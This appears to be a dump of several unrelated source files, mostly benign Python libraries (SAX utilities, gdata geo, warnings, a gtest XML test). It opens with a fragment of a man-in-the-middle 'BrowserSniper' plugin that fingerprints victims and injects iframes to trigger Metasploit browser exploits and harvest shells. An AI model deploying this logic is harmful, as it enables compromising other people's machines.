self.log.info("{} => OS: {} | Browser: {} | Java: {} | Flash: {}".format(vic_ip, os, browser, java, flash))
for exploit, details in self.config['BrowserSniper']['exploits'].iteritems():
if self._compat_system(details['OS'].lower(), details['Browser'].lower(), os.lower(), browser.lower()):
if details['Type'].lower() == 'browservuln':
exploits.append(exploit)
elif details['Type'].lower() == 'pluginvuln':
if details['Plugin'].lower() == 'java':
if (java is not None) and (java in details['PluginVersions']):
exploits.append(exploit)
elif details['Plugin'].lower() == 'flash':
if (flash is not None) and (flash in details['PluginVersions']):
exploits.append(exploit)
self.log.info("{} => Compatible exploits: {}".format(vic_ip, exploits))
return exploits
def injectAndPoll(self, ip, url): #here we inject an iframe to trigger the exploit and check for resulting sessions
#inject iframe
self.log.info("{} => Now injecting iframe to trigger exploits".format(ip))
self.html_url = url
#The following will poll Metasploit every 2 seconds for new sessions for a maximum of 60 seconds
#Will also make sure the shell actually came from the box that we targeted
self.log.info('{} => Waiting for ze shellz, sit back and relax...'.format(ip))
poll_n = 1
while poll_n != 30:
if self.msf.sessionsfrompeer(ip):
self.log.info("{} => Client haz been 0wn3d! Enjoy!".format(ip))
self.sploited_ips.append(ip)
self.black_ips = self.sploited_ips #Add to inject plugin blacklist since box has been popped
self.html_url = None
return
poll_n += 1
sleep(2)
self.log.info("{} => Session not established after 60 seconds".format(ip))
self.html_url = None
def snipe(self):
while True:
if self.output:
vic_ip = self.output['ip']
if vic_ip not in self.sploited_ips:
msfport = self.config['BrowserSniper']['msfport']
exploits = self.getExploits()
if not exploits:
self.log.info('{} => Client not vulnerable to any exploits, adding to blacklist'.format(vic_ip))
self.sploited_ips.append(vic_ip)
self.black_ips = self.sploited_ips
elif exploits and (vic_ip not in self.sploited_ips):
self.log.info("{} => Client vulnerable to {} exploits".format(vic_ip, len(exploits)))
for exploit in exploits:
jobs = self.msf.findjobs(exploit)
if jobs:
self.log.info('{} => {} already started'.format(vic_ip, exploit))
url = self.msf.jobinfo(jobs[0])['uripath'] #get the url assigned to the exploit
else:
url = self._setupExploit(exploit, msfport)
iframe_url = 'http://{}:{}{}'.format(self.msfip, msfport, url)
self.injectAndPoll(vic_ip, iframe_url)
sleep(1)
|
gpl-3.0
|
colinligertwood/odoo
|
addons/base_gengo/__openerp__.py
|
68
|
2119
|
# -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
'name': 'Automated Translations through Gengo API',
'version': '0.1',
'category': 'Tools',
'description': """
Automated Translations through Gengo API
========================================
This module will install passive scheduler job for automated translations
using the Gengo API. To activate it, you must
1) Configure your Gengo authentication parameters under `Settings > Companies > Gengo Parameters`
2) Launch the wizard under `Settings > Application Terms > Gengo: Manual Request of Translation` and follow the wizard.
This wizard will activate the CRON job and the Scheduler and will start the automatic translation via Gengo Services for all the terms where you requested it.
""",
'author': 'OpenERP SA',
'website': 'http://www.openerp.com',
'depends': ['base'],
'data': [
'gengo_sync_schedular_data.xml',
'ir_translation.xml',
'res_company_view.xml',
'wizard/base_gengo_translations_view.xml',
],
'demo': [],
'test': [],
'installable': True,
'auto_install': False,
}
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
|
agpl-3.0
|
PlayUAV/MissionPlanner
|
Lib/xml/sax/saxutils.py
|
53
|
10131
|
"""\
A library of useful helper classes to the SAX classes, for the
convenience of application and driver writers.
"""
import os, urlparse, urllib, types
import handler
import xmlreader
try:
_StringTypes = [types.StringType, types.UnicodeType]
except AttributeError:
_StringTypes = [types.StringType]
# See whether the xmlcharrefreplace error handler is
# supported
try:
from codecs import xmlcharrefreplace_errors
_error_handling = "xmlcharrefreplace"
del xmlcharrefreplace_errors
except ImportError:
_error_handling = "strict"
def __dict_replace(s, d):
"""Replace substrings of a string using a dictionary."""
for key, value in d.items():
s = s.replace(key, value)
return s
def escape(data, entities={}):
"""Escape &, <, and > in a string of data.
You can escape other strings of data by passing a dictionary as
the optional entities parameter. The keys and values must all be
strings; each key will be replaced with its corresponding value.
"""
# must do ampersand first
data = data.replace("&", "&")
data = data.replace(">", ">")
data = data.replace("<", "<")
if entities:
data = __dict_replace(data, entities)
return data
def unescape(data, entities={}):
"""Unescape &, <, and > in a string of data.
You can unescape other strings of data by passing a dictionary as
the optional entities parameter. The keys and values must all be
strings; each key will be replaced with its corresponding value.
"""
data = data.replace("<", "<")
data = data.replace(">", ">")
if entities:
data = __dict_replace(data, entities)
# must do ampersand last
return data.replace("&", "&")
def quoteattr(data, entities={}):
"""Escape and quote an attribute value.
Escape &, <, and > in a string of data, then quote it for use as
an attribute value. The \" character will be escaped as well, if
necessary.
You can escape other strings of data by passing a dictionary as
the optional entities parameter. The keys and values must all be
strings; each key will be replaced with its corresponding value.
"""
entities = entities.copy()
entities.update({'\n': ' ', '\r': ' ', '\t':'	'})
data = escape(data, entities)
if '"' in data:
if "'" in data:
data = '"%s"' % data.replace('"', """)
else:
data = "'%s'" % data
else:
data = '"%s"' % data
return data
class XMLGenerator(handler.ContentHandler):
def __init__(self, out=None, encoding="iso-8859-1"):
if out is None:
import sys
out = sys.stdout
handler.ContentHandler.__init__(self)
self._out = out
self._ns_contexts = [{}] # contains uri -> prefix dicts
self._current_context = self._ns_contexts[-1]
self._undeclared_ns_maps = []
self._encoding = encoding
def _write(self, text):
if isinstance(text, str):
self._out.write(text)
else:
self._out.write(text.encode(self._encoding, _error_handling))
def _qname(self, name):
"""Builds a qualified name from a (ns_url, localname) pair"""
if name[0]:
# Per http://www.w3.org/XML/1998/namespace, The 'xml' prefix is
# bound by definition to http://www.w3.org/XML/1998/namespace. It
# does not need to be declared and will not usually be found in
# self._current_context.
if 'http://www.w3.org/XML/1998/namespace' == name[0]:
return 'xml:' + name[1]
# The name is in a non-empty namespace
prefix = self._current_context[name[0]]
if prefix:
# If it is not the default namespace, prepend the prefix
return prefix + ":" + name[1]
# Return the unqualified name
return name[1]
# ContentHandler methods
def startDocument(self):
self._write('<?xml version="1.0" encoding="%s"?>\n' %
self._encoding)
def startPrefixMapping(self, prefix, uri):
self._ns_contexts.append(self._current_context.copy())
self._current_context[uri] = prefix
self._undeclared_ns_maps.append((prefix, uri))
def endPrefixMapping(self, prefix):
self._current_context = self._ns_contexts[-1]
del self._ns_contexts[-1]
def startElement(self, name, attrs):
self._write('<' + name)
for (name, value) in attrs.items():
self._write(' %s=%s' % (name, quoteattr(value)))
self._write('>')
def endElement(self, name):
self._write('</%s>' % name)
def startElementNS(self, name, qname, attrs):
self._write('<' + self._qname(name))
for prefix, uri in self._undeclared_ns_maps:
if prefix:
self._out.write(' xmlns:%s="%s"' % (prefix, uri))
else:
self._out.write(' xmlns="%s"' % uri)
self._undeclared_ns_maps = []
for (name, value) in attrs.items():
self._write(' %s=%s' % (self._qname(name), quoteattr(value)))
self._write('>')
def endElementNS(self, name, qname):
self._write('</%s>' % self._qname(name))
def characters(self, content):
self._write(escape(content))
def ignorableWhitespace(self, content):
self._write(content)
def processingInstruction(self, target, data):
self._write('<?%s %s?>' % (target, data))
class XMLFilterBase(xmlreader.XMLReader):
"""This class is designed to sit between an XMLReader and the
client application's event handlers. By default, it does nothing
but pass requests up to the reader and events on to the handlers
unmodified, but subclasses can override specific methods to modify
the event stream or the configuration requests as they pass
through."""
def __init__(self, parent = None):
xmlreader.XMLReader.__init__(self)
self._parent = parent
# ErrorHandler methods
def error(self, exception):
self._err_handler.error(exception)
def fatalError(self, exception):
self._err_handler.fatalError(exception)
def warning(self, exception):
self._err_handler.warning(exception)
# ContentHandler methods
def setDocumentLocator(self, locator):
self._cont_handler.setDocumentLocator(locator)
def startDocument(self):
self._cont_handler.startDocument()
def endDocument(self):
self._cont_handler.endDocument()
def startPrefixMapping(self, prefix, uri):
self._cont_handler.startPrefixMapping(prefix, uri)
def endPrefixMapping(self, prefix):
self._cont_handler.endPrefixMapping(prefix)
def startElement(self, name, attrs):
self._cont_handler.startElement(name, attrs)
def endElement(self, name):
self._cont_handler.endElement(name)
def startElementNS(self, name, qname, attrs):
self._cont_handler.startElementNS(name, qname, attrs)
def endElementNS(self, name, qname):
self._cont_handler.endElementNS(name, qname)
def characters(self, content):
self._cont_handler.characters(content)
def ignorableWhitespace(self, chars):
self._cont_handler.ignorableWhitespace(chars)
def processingInstruction(self, target, data):
self._cont_handler.processingInstruction(target, data)
def skippedEntity(self, name):
self._cont_handler.skippedEntity(name)
# DTDHandler methods
def notationDecl(self, name, publicId, systemId):
self._dtd_handler.notationDecl(name, publicId, systemId)
def unparsedEntityDecl(self, name, publicId, systemId, ndata):
self._dtd_handler.unparsedEntityDecl(name, publicId, systemId, ndata)
# EntityResolver methods
def resolveEntity(self, publicId, systemId):
return self._ent_handler.resolveEntity(publicId, systemId)
# XMLReader methods
def parse(self, source):
self._parent.setContentHandler(self)
self._parent.setErrorHandler(self)
self._parent.setEntityResolver(self)
self._parent.setDTDHandler(self)
self._parent.parse(source)
def setLocale(self, locale):
self._parent.setLocale(locale)
def getFeature(self, name):
return self._parent.getFeature(name)
def setFeature(self, name, state):
self._parent.setFeature(name, state)
def getProperty(self, name):
return self._parent.getProperty(name)
def setProperty(self, name, value):
self._parent.setProperty(name, value)
# XMLFilter methods
def getParent(self):
return self._parent
def setParent(self, parent):
self._parent = parent
# --- Utility functions
def prepare_input_source(source, base = ""):
"""This function takes an InputSource and an optional base URL and
returns a fully resolved InputSource object ready for reading."""
if type(source) in _StringTypes:
source = xmlreader.InputSource(source)
elif hasattr(source, "read"):
f = source
source = xmlreader.InputSource()
source.setByteStream(f)
if hasattr(f, "name"):
source.setSystemId(f.name)
if source.getByteStream() is None:
sysid = source.getSystemId()
basehead = os.path.dirname(os.path.normpath(base))
sysidfilename = os.path.join(basehead, sysid)
if os.path.isfile(sysidfilename):
source.setSystemId(sysidfilename)
f = open(sysidfilename, "rb")
else:
source.setSystemId(urlparse.urljoin(base, sysid))
f = urllib.urlopen(source.getSystemId())
source.setByteStream(f)
return source
|
gpl-3.0
|
Zanzibar82/streamondemand.test
|
lib/gdata/geo/__init__.py
|
249
|
6006
|
# -*-*- encoding: utf-8 -*-*-
#
# This is gdata.photos.geo, implementing geological positioning in gdata structures
#
# $Id: __init__.py 81 2007-10-03 14:41:42Z havard.gulldahl $
#
# Copyright 2007 Håvard Gulldahl
# Portions copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Picasa Web Albums uses the georss and gml namespaces for
elements defined in the GeoRSS and Geography Markup Language specifications.
Specifically, Picasa Web Albums uses the following elements:
georss:where
gml:Point
gml:pos
http://code.google.com/apis/picasaweb/reference.html#georss_reference
Picasa Web Albums also accepts geographic-location data in two other formats:
W3C format and plain-GeoRSS (without GML) format.
"""
#
#Over the wire, the Picasa Web Albums only accepts and sends the
#elements mentioned above, but this module will let you seamlessly convert
#between the different formats (TODO 2007-10-18 hg)
__author__ = u'[email protected]'# (Håvard Gulldahl)' #BUG: api chokes on non-ascii chars in __author__
__license__ = 'Apache License v2'
import atom
import gdata
GEO_NAMESPACE = 'http://www.w3.org/2003/01/geo/wgs84_pos#'
GML_NAMESPACE = 'http://www.opengis.net/gml'
GEORSS_NAMESPACE = 'http://www.georss.org/georss'
class GeoBaseElement(atom.AtomBase):
"""Base class for elements.
To add new elements, you only need to add the element tag name to self._tag
and the namespace to self._namespace
"""
_tag = ''
_namespace = GML_NAMESPACE
_children = atom.AtomBase._children.copy()
_attributes = atom.AtomBase._attributes.copy()
def __init__(self, name=None, extension_elements=None,
extension_attributes=None, text=None):
self.name = name
self.text = text
self.extension_elements = extension_elements or []
self.extension_attributes = extension_attributes or {}
class Pos(GeoBaseElement):
"""(string) Specifies a latitude and longitude, separated by a space,
e.g. `35.669998 139.770004'"""
_tag = 'pos'
def PosFromString(xml_string):
return atom.CreateClassFromXMLString(Pos, xml_string)
class Point(GeoBaseElement):
"""(container) Specifies a particular geographical point, by means of
a <gml:pos> element."""
_tag = 'Point'
_children = atom.AtomBase._children.copy()
_children['{%s}pos' % GML_NAMESPACE] = ('pos', Pos)
def __init__(self, pos=None, extension_elements=None, extension_attributes=None, text=None):
GeoBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
if pos is None:
pos = Pos()
self.pos=pos
def PointFromString(xml_string):
return atom.CreateClassFromXMLString(Point, xml_string)
class Where(GeoBaseElement):
"""(container) Specifies a geographical location or region.
A container element, containing a single <gml:Point> element.
(Not to be confused with <gd:where>.)
Note that the (only) child attribute, .Point, is title-cased.
This reflects the names of elements in the xml stream
(principle of least surprise).
As a convenience, you can get a tuple of (lat, lon) with Where.location(),
and set the same data with Where.setLocation( (lat, lon) ).
Similarly, there are methods to set and get only latitude and longitude.
"""
_tag = 'where'
_namespace = GEORSS_NAMESPACE
_children = atom.AtomBase._children.copy()
_children['{%s}Point' % GML_NAMESPACE] = ('Point', Point)
def __init__(self, point=None, extension_elements=None, extension_attributes=None, text=None):
GeoBaseElement.__init__(self, extension_elements=extension_elements,
extension_attributes=extension_attributes,
text=text)
if point is None:
point = Point()
self.Point=point
def location(self):
"(float, float) Return Where.Point.pos.text as a (lat,lon) tuple"
try:
return tuple([float(z) for z in self.Point.pos.text.split(' ')])
except AttributeError:
return tuple()
def set_location(self, latlon):
"""(bool) Set Where.Point.pos.text from a (lat,lon) tuple.
Arguments:
lat (float): The latitude in degrees, from -90.0 to 90.0
lon (float): The longitude in degrees, from -180.0 to 180.0
Returns True on success.
"""
assert(isinstance(latlon[0], float))
assert(isinstance(latlon[1], float))
try:
self.Point.pos.text = "%s %s" % (latlon[0], latlon[1])
return True
except AttributeError:
return False
def latitude(self):
"(float) Get the latitude value of the geo-tag. See also .location()"
lat, lon = self.location()
return lat
def longitude(self):
"(float) Get the longtitude value of the geo-tag. See also .location()"
lat, lon = self.location()
return lon
longtitude = longitude
def set_latitude(self, lat):
"""(bool) Set the latitude value of the geo-tag.
Args:
lat (float): The new latitude value
See also .set_location()
"""
_lat, lon = self.location()
return self.set_location(lat, lon)
def set_longitude(self, lon):
"""(bool) Set the longtitude value of the geo-tag.
Args:
lat (float): The new latitude value
See also .set_location()
"""
lat, _lon = self.location()
return self.set_location(lat, lon)
set_longtitude = set_longitude
def WhereFromString(xml_string):
return atom.CreateClassFromXMLString(Where, xml_string)
|
gpl-3.0
|
40223245/2015cdb_g6-team1
|
static/Brython3.1.1-20150328-091302/Lib/warnings.py
|
752
|
13825
|
"""Python part of the warnings subsystem."""
# Note: function level imports should *not* be used
# in this module as it may cause import lock deadlock.
# See bug 683658.
import linecache
import sys
__all__ = ["warn", "showwarning", "formatwarning", "filterwarnings",
"resetwarnings", "catch_warnings"]
def showwarning(message, category, filename, lineno, file=None, line=None):
"""Hook to write a warning to a file; replace if you like."""
if file is None:
file = sys.stderr
try:
file.write(formatwarning(message, category, filename, lineno, line))
except IOError:
pass # the file (probably stderr) is invalid - this warning gets lost.
def formatwarning(message, category, filename, lineno, line=None):
"""Function to format a warning the standard way."""
s = "%s:%s: %s: %s\n" % (filename, lineno, category.__name__, message)
line = linecache.getline(filename, lineno) if line is None else line
if line:
line = line.strip()
s += " %s\n" % line
return s
def filterwarnings(action, message="", category=Warning, module="", lineno=0,
append=False):
"""Insert an entry into the list of warnings filters (at the front).
'action' -- one of "error", "ignore", "always", "default", "module",
or "once"
'message' -- a regex that the warning message must match
'category' -- a class that the warning must be a subclass of
'module' -- a regex that the module name must match
'lineno' -- an integer line number, 0 matches all warnings
'append' -- if true, append to the list of filters
"""
import re
assert action in ("error", "ignore", "always", "default", "module",
"once"), "invalid action: %r" % (action,)
assert isinstance(message, str), "message must be a string"
assert isinstance(category, type), "category must be a class"
assert issubclass(category, Warning), "category must be a Warning subclass"
assert isinstance(module, str), "module must be a string"
assert isinstance(lineno, int) and lineno >= 0, \
"lineno must be an int >= 0"
item = (action, re.compile(message, re.I), category,
re.compile(module), lineno)
if append:
filters.append(item)
else:
filters.insert(0, item)
def simplefilter(action, category=Warning, lineno=0, append=False):
"""Insert a simple entry into the list of warnings filters (at the front).
A simple filter matches all modules and messages.
'action' -- one of "error", "ignore", "always", "default", "module",
or "once"
'category' -- a class that the warning must be a subclass of
'lineno' -- an integer line number, 0 matches all warnings
'append' -- if true, append to the list of filters
"""
assert action in ("error", "ignore", "always", "default", "module",
"once"), "invalid action: %r" % (action,)
assert isinstance(lineno, int) and lineno >= 0, \
"lineno must be an int >= 0"
item = (action, None, category, None, lineno)
if append:
filters.append(item)
else:
filters.insert(0, item)
def resetwarnings():
"""Clear the list of warning filters, so that no filters are active."""
filters[:] = []
class _OptionError(Exception):
"""Exception used by option processing helpers."""
pass
# Helper to process -W options passed via sys.warnoptions
def _processoptions(args):
for arg in args:
try:
_setoption(arg)
except _OptionError as msg:
print("Invalid -W option ignored:", msg, file=sys.stderr)
# Helper for _processoptions()
def _setoption(arg):
import re
parts = arg.split(':')
if len(parts) > 5:
raise _OptionError("too many fields (max 5): %r" % (arg,))
while len(parts) < 5:
parts.append('')
action, message, category, module, lineno = [s.strip()
for s in parts]
action = _getaction(action)
message = re.escape(message)
category = _getcategory(category)
module = re.escape(module)
if module:
module = module + '$'
if lineno:
try:
lineno = int(lineno)
if lineno < 0:
raise ValueError
except (ValueError, OverflowError):
raise _OptionError("invalid lineno %r" % (lineno,))
else:
lineno = 0
filterwarnings(action, message, category, module, lineno)
# Helper for _setoption()
def _getaction(action):
if not action:
return "default"
if action == "all": return "always" # Alias
for a in ('default', 'always', 'ignore', 'module', 'once', 'error'):
if a.startswith(action):
return a
raise _OptionError("invalid action: %r" % (action,))
# Helper for _setoption()
def _getcategory(category):
import re
if not category:
return Warning
if re.match("^[a-zA-Z0-9_]+$", category):
try:
cat = eval(category)
except NameError:
raise _OptionError("unknown warning category: %r" % (category,))
else:
i = category.rfind(".")
module = category[:i]
klass = category[i+1:]
try:
m = __import__(module, None, None, [klass])
except ImportError:
raise _OptionError("invalid module name: %r" % (module,))
try:
cat = getattr(m, klass)
except AttributeError:
raise _OptionError("unknown warning category: %r" % (category,))
if not issubclass(cat, Warning):
raise _OptionError("invalid warning category: %r" % (category,))
return cat
# Code typically replaced by _warnings
def warn(message, category=None, stacklevel=1):
"""Issue a warning, or maybe ignore it or raise an exception."""
# Check if message is already a Warning object
if isinstance(message, Warning):
category = message.__class__
# Check category argument
if category is None:
category = UserWarning
assert issubclass(category, Warning)
# Get context information
try:
caller = sys._getframe(stacklevel)
except ValueError:
globals = sys.__dict__
lineno = 1
else:
globals = caller.f_globals
lineno = caller.f_lineno
if '__name__' in globals:
module = globals['__name__']
else:
module = "<string>"
filename = globals.get('__file__')
if filename:
fnl = filename.lower()
if fnl.endswith((".pyc", ".pyo")):
filename = filename[:-1]
else:
if module == "__main__":
try:
filename = sys.argv[0]
except AttributeError:
# embedded interpreters don't have sys.argv, see bug #839151
filename = '__main__'
if not filename:
filename = module
registry = globals.setdefault("__warningregistry__", {})
warn_explicit(message, category, filename, lineno, module, registry,
globals)
def warn_explicit(message, category, filename, lineno,
module=None, registry=None, module_globals=None):
lineno = int(lineno)
if module is None:
module = filename or "<unknown>"
if module[-3:].lower() == ".py":
module = module[:-3] # XXX What about leading pathname?
if registry is None:
registry = {}
if isinstance(message, Warning):
text = str(message)
category = message.__class__
else:
text = message
message = category(message)
key = (text, category, lineno)
# Quick test for common case
if registry.get(key):
return
# Search the filters
for item in filters:
action, msg, cat, mod, ln = item
if ((msg is None or msg.match(text)) and
issubclass(category, cat) and
(mod is None or mod.match(module)) and
(ln == 0 or lineno == ln)):
break
else:
action = defaultaction
# Early exit actions
if action == "ignore":
registry[key] = 1
return
# Prime the linecache for formatting, in case the
# "file" is actually in a zipfile or something.
linecache.getlines(filename, module_globals)
if action == "error":
raise message
# Other actions
if action == "once":
registry[key] = 1
oncekey = (text, category)
if onceregistry.get(oncekey):
return
onceregistry[oncekey] = 1
elif action == "always":
pass
elif action == "module":
registry[key] = 1
altkey = (text, category, 0)
if registry.get(altkey):
return
registry[altkey] = 1
elif action == "default":
registry[key] = 1
else:
# Unrecognized actions are errors
raise RuntimeError(
"Unrecognized action (%r) in warnings.filters:\n %s" %
(action, item))
if not callable(showwarning):
raise TypeError("warnings.showwarning() must be set to a "
"function or method")
# Print message and context
showwarning(message, category, filename, lineno)
class WarningMessage(object):
"""Holds the result of a single showwarning() call."""
_WARNING_DETAILS = ("message", "category", "filename", "lineno", "file",
"line")
def __init__(self, message, category, filename, lineno, file=None,
line=None):
local_values = locals()
for attr in self._WARNING_DETAILS:
setattr(self, attr, local_values[attr])
self._category_name = category.__name__ if category else None
def __str__(self):
return ("{message : %r, category : %r, filename : %r, lineno : %s, "
"line : %r}" % (self.message, self._category_name,
self.filename, self.lineno, self.line))
class catch_warnings(object):
"""A context manager that copies and restores the warnings filter upon
exiting the context.
The 'record' argument specifies whether warnings should be captured by a
custom implementation of warnings.showwarning() and be appended to a list
returned by the context manager. Otherwise None is returned by the context
manager. The objects appended to the list are arguments whose attributes
mirror the arguments to showwarning().
The 'module' argument is to specify an alternative module to the module
named 'warnings' and imported under that name. This argument is only useful
when testing the warnings module itself.
"""
def __init__(self, *, record=False, module=None):
"""Specify whether to record warnings and if an alternative module
should be used other than sys.modules['warnings'].
For compatibility with Python 3.0, please consider all arguments to be
keyword-only.
"""
self._record = record
self._module = sys.modules['warnings'] if module is None else module
self._entered = False
def __repr__(self):
args = []
if self._record:
args.append("record=True")
if self._module is not sys.modules['warnings']:
args.append("module=%r" % self._module)
name = type(self).__name__
return "%s(%s)" % (name, ", ".join(args))
def __enter__(self):
if self._entered:
raise RuntimeError("Cannot enter %r twice" % self)
self._entered = True
self._filters = self._module.filters
self._module.filters = self._filters[:]
self._showwarning = self._module.showwarning
if self._record:
log = []
def showwarning(*args, **kwargs):
log.append(WarningMessage(*args, **kwargs))
self._module.showwarning = showwarning
return log
else:
return None
def __exit__(self, *exc_info):
if not self._entered:
raise RuntimeError("Cannot exit %r without entering first" % self)
self._module.filters = self._filters
self._module.showwarning = self._showwarning
# filters contains a sequence of filter 5-tuples
# The components of the 5-tuple are:
# - an action: error, ignore, always, default, module, or once
# - a compiled regex that must match the warning message
# - a class representing the warning category
# - a compiled regex that must match the module that is being warned
# - a line number for the line being warning, or 0 to mean any line
# If either if the compiled regexs are None, match anything.
_warnings_defaults = False
try:
from _warnings import (filters, _defaultaction, _onceregistry,
warn, warn_explicit)
defaultaction = _defaultaction
onceregistry = _onceregistry
_warnings_defaults = True
except ImportError:
filters = []
defaultaction = "default"
onceregistry = {}
# Module initialization
_processoptions(sys.warnoptions)
if not _warnings_defaults:
silence = [ImportWarning, PendingDeprecationWarning]
silence.append(DeprecationWarning)
for cls in silence:
simplefilter("ignore", category=cls)
bytes_warning = sys.flags.bytes_warning
if bytes_warning > 1:
bytes_action = "error"
elif bytes_warning:
bytes_action = "default"
else:
bytes_action = "ignore"
simplefilter(bytes_action, category=BytesWarning, append=1)
# resource usage warnings are enabled by default in pydebug mode
if hasattr(sys, 'gettotalrefcount'):
resource_action = "always"
else:
resource_action = "ignore"
simplefilter(resource_action, category=ResourceWarning, append=1)
del _warnings_defaults
|
gpl-3.0
|
hadjian/gtest-1.6.0
|
test/gtest_xml_output_unittest.py
|
397
|
11279
|
#!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for the gtest_xml_output module"""
__author__ = '[email protected] (Sean Mcafee)'
import errno
import os
import sys
from xml.dom import minidom, Node
import gtest_test_utils
import gtest_xml_test_utils
GTEST_OUTPUT_FLAG = "--gtest_output"
GTEST_DEFAULT_OUTPUT_FILE = "test_detail.xml"
GTEST_PROGRAM_NAME = "gtest_xml_output_unittest_"
SUPPORTS_STACK_TRACES = False
if SUPPORTS_STACK_TRACES:
STACK_TRACE_TEMPLATE = "\nStack trace:\n*"
else:
STACK_TRACE_TEMPLATE = ""
EXPECTED_NON_EMPTY_XML = """<?xml version="1.0" encoding="UTF-8"?>
<testsuites tests="23" failures="4" disabled="2" errors="0" time="*" name="AllTests">
<testsuite name="SuccessfulTest" tests="1" failures="0" disabled="0" errors="0" time="*">
<testcase name="Succeeds" status="run" time="*" classname="SuccessfulTest"/>
</testsuite>
<testsuite name="FailedTest" tests="1" failures="1" disabled="0" errors="0" time="*">
<testcase name="Fails" status="run" time="*" classname="FailedTest">
<failure message="Value of: 2
Expected: 1" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Value of: 2
Expected: 1%(stack)s]]></failure>
</testcase>
</testsuite>
<testsuite name="MixedResultTest" tests="3" failures="1" disabled="1" errors="0" time="*">
<testcase name="Succeeds" status="run" time="*" classname="MixedResultTest"/>
<testcase name="Fails" status="run" time="*" classname="MixedResultTest">
<failure message="Value of: 2
Expected: 1" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Value of: 2
Expected: 1%(stack)s]]></failure>
<failure message="Value of: 3
Expected: 2" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Value of: 3
Expected: 2%(stack)s]]></failure>
</testcase>
<testcase name="DISABLED_test" status="notrun" time="*" classname="MixedResultTest"/>
</testsuite>
<testsuite name="XmlQuotingTest" tests="1" failures="1" disabled="0" errors="0" time="*">
<testcase name="OutputsCData" status="run" time="*" classname="XmlQuotingTest">
<failure message="Failed
XML output: <?xml encoding="utf-8"><top><![CDATA[cdata text]]></top>" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Failed
XML output: <?xml encoding="utf-8"><top><![CDATA[cdata text]]>]]><![CDATA[</top>%(stack)s]]></failure>
</testcase>
</testsuite>
<testsuite name="InvalidCharactersTest" tests="1" failures="1" disabled="0" errors="0" time="*">
<testcase name="InvalidCharactersInMessage" status="run" time="*" classname="InvalidCharactersTest">
<failure message="Failed
Invalid characters in brackets []" type=""><![CDATA[gtest_xml_output_unittest_.cc:*
Failed
Invalid characters in brackets []%(stack)s]]></failure>
</testcase>
</testsuite>
<testsuite name="DisabledTest" tests="1" failures="0" disabled="1" errors="0" time="*">
<testcase name="DISABLED_test_not_run" status="notrun" time="*" classname="DisabledTest"/>
</testsuite>
<testsuite name="PropertyRecordingTest" tests="4" failures="0" disabled="0" errors="0" time="*">
<testcase name="OneProperty" status="run" time="*" classname="PropertyRecordingTest" key_1="1"/>
<testcase name="IntValuedProperty" status="run" time="*" classname="PropertyRecordingTest" key_int="1"/>
<testcase name="ThreeProperties" status="run" time="*" classname="PropertyRecordingTest" key_1="1" key_2="2" key_3="3"/>
<testcase name="TwoValuesForOneKeyUsesLastValue" status="run" time="*" classname="PropertyRecordingTest" key_1="2"/>
</testsuite>
<testsuite name="NoFixtureTest" tests="3" failures="0" disabled="0" errors="0" time="*">
<testcase name="RecordProperty" status="run" time="*" classname="NoFixtureTest" key="1"/>
<testcase name="ExternalUtilityThatCallsRecordIntValuedProperty" status="run" time="*" classname="NoFixtureTest" key_for_utility_int="1"/>
<testcase name="ExternalUtilityThatCallsRecordStringValuedProperty" status="run" time="*" classname="NoFixtureTest" key_for_utility_string="1"/>
</testsuite>
<testsuite name="Single/ValueParamTest" tests="4" failures="0" disabled="0" errors="0" time="*">
<testcase name="HasValueParamAttribute/0" value_param="33" status="run" time="*" classname="Single/ValueParamTest" />
<testcase name="HasValueParamAttribute/1" value_param="42" status="run" time="*" classname="Single/ValueParamTest" />
